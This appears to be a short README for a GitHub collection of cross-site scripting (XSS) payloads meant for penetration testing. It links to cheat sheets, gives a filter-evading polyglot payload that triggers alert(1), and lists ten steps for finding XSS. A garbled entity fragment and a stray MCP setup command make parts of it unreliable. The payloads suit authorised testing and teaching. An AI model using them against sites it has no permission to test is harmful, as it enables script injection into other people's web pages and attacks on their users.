:star: Star us on GitHub — it motivates a lot! :star:
If you have any XSS payload, just create a PullRequest.
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet https://medium.com/p/92ac1180e0d0 https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)
Rules To Find XSS
1: injecting haramless HTML ,
2: injecting HTML Entities
<b> \u003b\u00
3 :injecting Script Tag
4: Testing For Recursive Filters
5: injecting Anchor Tag
6: Testing For Event Handlers
7: Input Less Common Event Handlers
8: Testing With SRC Attrubute
9: Testing With Action Attrubute
10: Injecting HTML 5 Based Payload
Needless to mention, please use this tool very very carefully. The authors won't be responsible for any consequences.
—
$ claude mcp add xss-payload-list \
-- python -m otcore.mcp_server <graph>